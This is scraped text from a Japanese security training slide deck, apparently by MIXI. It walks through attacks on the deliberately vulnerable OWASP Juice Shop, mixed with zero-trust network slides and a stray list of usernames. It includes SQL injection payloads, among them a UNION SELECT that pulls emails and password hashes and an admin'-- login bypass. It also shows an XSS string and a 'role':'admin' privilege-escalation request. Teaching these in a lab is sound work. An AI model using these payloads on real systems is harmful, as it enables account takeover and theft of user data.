使い方 i. 試験したいリクエストを 「Send to Intruder」。 ii. Intruder画面にて、試験したい箇所を 「§」で囲む。 iii. 下記の試験値サンプルをコピーし、 「Payloads」→「Payload settings」の 「Paste」をクリック。 • hoge • huga • piyo
使い方 i. 試験したいリクエストを 「Send to Intruder」。 ii. Intruder画面にて、試験したい箇所を 「§」で囲む。 iii. 下記の試験値サンプルをコピーし、 「Payloads」→「Payload settings」の 「Paste」をクリック。 • hoge • huga • piyo iv. 「Start attack」をクリック。
使い方 i. 試験したいリクエストを 「Send to Intruder」。 ii. Intruder画面にて、試験したい箇所を 「§」で囲む。 iii. 下記の試験値サンプルをコピーし、 「Payloads」→「Payload settings」の 「Paste」をクリック。 • hoge • huga • piyo iv. 「Start attack」をクリック。 v. 「§」の箇所に試験値が送信される。 その結果を一覧で確認できる。
ユーザー権限によるリクエストの場合は、「"role":"customer"」部が変更され得ないようにする。 • Juice Shop側(作り手側)としては「"role":"customer"」は本来の処理では送られてこないパラメータなの で、対策観点から漏れやすい問題なのかもしれません。だからこそ注意をはらう必要があります。
• SELECT * FROM xxxx WHERE id = 'test@example' and password = 'password123'; • 検索時のSQL文(想像) • SELECT * FROM xxxx WHERE name like = '%Apple%'; 不正アクセスのためにSQLインジェクションを狙う
意図的にSQLシンタックスを壊す。 • [環境URL]/rest/user/login の「email」の値を改ざん • SELECT * FROM xxxx WHERE id = 'test@example'' and password = 'password123'; • [環境URL]/rest/product/search?q=Apple の「q」の値を改ざん • SELECT * FROM xxxx WHERE name like = '%Apple'%'; SQLインジェクションできる場所を見つけたぞ!
• 先ほどのログイン時のSQLITE_ERROR内容から、テーブル名、カラム名が判明している。つまりこ こで発行されるSQL文は下記のよう。 • "SELECT * FROM Users WHERE email = '[email protected]'' AND password = 'b0baee9d279d34fa1dfd71aadb908c3f' AND deletedAt IS NULL" SQLインジェクションでいざ情報奪取!
dog wanwan tama cat nyaaaaaan!!! name nickname syumi yamada yamachaso tozan tanaka nakata nyaaaaaan!!! name kind nakigoe pochi dog wanwan tama cat nyaaaaaan!!! yamada yamachaso tozan tanaka nakata nyaaaaaan!!! SELECT name,kind,nakigoe FROM animals SELECT name,nickname,syumi FROM friends; UNION UNION
SELECT * FROM Products WHERE ((name LIKE '%APPLE'%' OR description LIKE '%APPLE'%') AND deletedAt IS NULL) ORDER BY name • テーブル名: Products • カラム名: name, description, deletedAt • ログイン時のSQLエラーから収集できたUsersテーブルの情報 • SELECT * FROM Users WHERE email = '[email protected]'' AND password = '79ac8e0c5fbb7fffa893660a9f581303' • テーブル名: Users • カラム名: email, password ← 欲しいのはコレ! SQLインジェクションでいざ情報奪取!
FROM Products WHERE ((name LIKE '%APPLE%')) UNION SELECT email, password FROM Users––%' OR description LIKE '%Apple'%') AND deletedAt IS NULL) ORDER BY name 下記のエラーになるはずです。 • SQLITE_ERROR: SELECTs to the left and right of UNION do not have the same number of result columns • UNION時には、連結するカラム数を同じにする必要があります。 SQLインジェクションでいざ情報奪取!
App & Data インターネット Saas の App & Data AWS上 の App & Data Google Cloud上 の App & Data クラウド的なものたち VPN 会社ではないどこか PC PC PC 業務用ならIP制限するものたち 会社IPがこれ ここに繋ぐと認証等の各種対策/制約により下記が得られていた。 • 見知らぬ者が社内NWに居ない。→(盗聴者や攻撃者の排除) • 攻撃監視やロギングが一定される。→(攻撃の検知や調査) • 会社の終端装置から外に出る。→(IP制限による攻撃者排除)
App & Data インターネット Saas の App & Data AWS上 の App & Data Google Cloud上 の App & Data クラウド的なものたち VPN 会社ではないどこか PC PC PC 業務用ならIP制限するものたち 会社IPがこれ ここに繋ぐと認証等の各種対策/制約により下記が得られていた。 • 見知らぬ者が社内NWに居ない。→(盗聴者や攻撃者の排除) • 攻撃監視やロギングが一定される。→(攻撃の検知や調査) • 会社の終端装置から外に出る。→(IP制限による攻撃者排除) 社内なら安心なので アクセスされる側は信じる 社内なら安心なので アクセスされる側は信じる
App & Data インターネット Saas の App & Data AWS上 の App & Data Google Cloud上 の App & Data クラウド的なものたち VPN 会社ではないどこか PC PC PC 業務用ならIP制限するものたち 会社IPがこれ ここに繋ぐと認証等の各種対策/制約により下記が得られていた。 • 見知らぬ者が社内NWに居ない。→(盗聴者や攻撃者の排除) • 攻撃監視やロギングが一定される。→(攻撃の検知や調査) • 会社の終端装置から外に出る。→(IP制限による攻撃者排除) 社内なら安心なので アクセスされる側は信じる 社内なら安心なので アクセスされる側は信じる 社内ネットワークなら安心という世界観
a. PolicyTypeにバックエンドセキュリティポリシーを選択 3. Default rule Action a. デフォルトは拒否でステータス403 4. ルールの追加 a. モード→基本モード b. 一致→許可したいIP c. 優先度→1000 5. ターゲットへのポリシーの適用 a. ターゲットの追加(ロードバランサのバックエンドサービス) 6. 高度な作成 a. スルー 以上で設定したIP以外でアクセスすると403エラーが返るようになります。
App & Data インターネット Saas の App & Data AWS上 の App & Data Google Cloud上 の App & Data クラウド的なものたち VPN 会社ではないどこか PC PC PC 業務用ならIP制限するものたち 会社IPがこれ ここに繋ぐと認証等の各種対策/制約により下記が得られていた。 • 見知らぬ者が社内NWに居ない。→(盗聴者や攻撃者の排除) • 攻撃監視やロギングが一定される。→(攻撃の検知や調査) • 会社の終端装置から外に出る。→(IP制限による攻撃者排除) 社内なら安心なので アクセスされる側は信じる 社内なら安心なので アクセスされる側は信じる 社内ネットワークなら安心という世界観
App & Data インターネット Saas の App & Data AWS上 の App & Data Google Cloud上 の App & Data クラウド的なものたち VPN 会社ではないどこか PC PC PC 業務用ならIP制限するものたち 会社IPがこれ ここに繋ぐと認証等の各種対策/制約により下記が得られていた。 • 見知らぬ者が社内NWに居ない。→(盗聴者や攻撃者の排除) • 攻撃監視やロギングが一定される。→(攻撃の検知や調査) • 会社の終端装置から外に出る。→(IP制限による攻撃者排除) と思ったらインターネット社会では思い通りにはならなかった。 標的型攻撃はじめ色々な攻撃リスクが顕在化してきた。 色々繋がるネット社会において完全クリーンにすることは困難。
Web App User」欄に自分を追加 a. これでアクセス権が付与される 4. IAPのON/OFF、IAP-secured Web App Userの付与/剥奪によって挙動の変化を確認 a. 確認すること b. IAPをONにして、かつアクセス権があるときの挙動 i. Googleログイン後にアクセスできればOK c. IAPをONにして、かつアクセス権が無いときの挙動 i. レスポンスが「You dont have access」になればOK d. IAPをOFFにしたときの挙動 i. シークレットブラウザなど、Googleログインしてない状態でアクセスできたらOK
G x 0 せいすい 100 G x 0 買う 売る どうぐ はなす 所持金 999999G shop shop 儲かったんだが Lvl 99 そせいやく 500 G x 1 やくそう 50 G x 0 どくけし 999 G x 0 せいすい 100 G x 0 買う 売る どうぐ はなす 所持金 1000G shop いらっしゃい shop 買うぞ 999999 検索 1件 ヒット ----------------------------------- ----- 000D7DE8 999999 お金持ち! !
mixi_engineers
cyberagentdevelopers
takabow
minorun365
tsumita
shotashiratori
furuton
taddy_919
miholovesq
scottboms
hatefulcrawdad
maggiecrowley
trallard
michaelherold
aleyda
colly
erikaheidi
bkeepers
jcasabona
ddemaree
panda_program
![©MIXI 88 第二問 クロスサイトスクリプティング • 「javascript:alert(`xss`)」←このJavascriptを注入できる場所を探し、サイト上で動かしましょう! ヒント2 • [環境URL]/#/search が怪しい...?](https://files.speakerdeck.com/presentations/bb083d820be044d1ba6e6b769acf57fa/slide_87.jpg){kind=link}
![©MIXI 89 第二問 クロスサイトスクリプティング • 「javascript:alert(`xss`)」←このJavascriptを注入できる場所を探し、サイト上で動かしましょう! ヒント3 • 検索フォーム([環境URL]/#/search)に以下を入力して結果を見てみましょう •](https://files.speakerdeck.com/presentations/bb083d820be044d1ba6e6b769acf57fa/slide_88.jpg){kind=link}
![©MIXI 97 第三問 安く(不正に)購入してみよう ヒント • カート内の数量変更時の通信を見てみよう。 • [環境URL]/api/BasketItems/{n}](https://files.speakerdeck.com/presentations/bb083d820be044d1ba6e6b769acf57fa/slide_96.jpg){kind=link}
![©MIXI 103 第四問 adminユーザーとして会員登録しよう(権限昇格) ヒント1 • 会員登録フォーム([環境URL]/api/Users)の通信を見てみよう。どこか怪しいところはない?](https://files.speakerdeck.com/presentations/bb083d820be044d1ba6e6b769acf57fa/slide_102.jpg){kind=link}
![©MIXI 105 第四問 adminユーザーとして会員登録しよう(権限昇格) 答え • 「,"role":"admin"」を無理やりjsonに付与した、下記のような値で会員登録する。 {"email":"[email protected]","password":"hogehoge","passwordRepeat":"hogehoge","securityQuestion":{"id":4,"question":"Father's birth date?](https://files.speakerdeck.com/presentations/bb083d820be044d1ba6e6b769acf57fa/slide_104.jpg){kind=link}
![©MIXI 111 総合演習 1. 管理者用ページを見つけよう ヒント1 • [環境URL]/#/search のHTMLソースを見てみよう。 まずは情報収集](https://files.speakerdeck.com/presentations/bb083d820be044d1ba6e6b769acf57fa/slide_110.jpg){kind=link}
![©MIXI 112 総合演習 1. 管理者用ページを見つけよう ヒント2 • [環境URL]/#/search のHTMLソースを見てみよう。 • さらにmain.js内のpath部分を見てみよう。](https://files.speakerdeck.com/presentations/bb083d820be044d1ba6e6b769acf57fa/slide_111.jpg){kind=link}
![©MIXI 113 総合演習 1. 管理者用ページを見つけよう 答え • [環境URL]/#/administration が管理者ページ • 開発者ツールで、main.js内を「administration」で検索すると見つかる。](https://files.speakerdeck.com/presentations/bb083d820be044d1ba6e6b769acf57fa/slide_112.jpg){kind=link}
![©MIXI 114 このページに不正アクセスできたら悪さできそうだな 総合演習 1. 管理者用ページを見つけよう 答え • [環境URL]/#/administration が管理者ページ •](https://files.speakerdeck.com/presentations/bb083d820be044d1ba6e6b769acf57fa/slide_113.jpg){kind=link}
![©MIXI 128 総合演習 3. SQLインジェクションを悪用して全ユーザーの情報(Eメール、パスワードハッシュ)を抜き出そう ヒント1 • 商品検索のリクエストを見てみよう。 • [環境URL]/rest/product/search?q=apple](https://files.speakerdeck.com/presentations/bb083d820be044d1ba6e6b769acf57fa/slide_127.jpg){kind=link}
![©MIXI 137 総合演習 4. 「[email protected]」ユーザーでログインしよう 試しにこいつに不正アクセスしてみよう](https://files.speakerdeck.com/presentations/bb083d820be044d1ba6e6b769acf57fa/slide_136.jpg){kind=link}
![©MIXI 138 総合演習 4. 「[email protected]」ユーザーでログインしよう 答え • Emailの値を「[email protected]'--」にする • SELECT](https://files.speakerdeck.com/presentations/bb083d820be044d1ba6e6b769acf57fa/slide_137.jpg){kind=link}
![©MIXI 141 総合演習 5. adminユーザーでログインしよう 答え1 • 先ほど取得したユーザー情報の一覧から、adminユーザーのEメールは「[email protected]」と分 かる。これに対し、Eメールの値を「[email protected]'--」とし、SQLインジェクションによるパ スワード不要でのログインを行う。](https://files.speakerdeck.com/presentations/bb083d820be044d1ba6e6b769acf57fa/slide_140.jpg){kind=link}
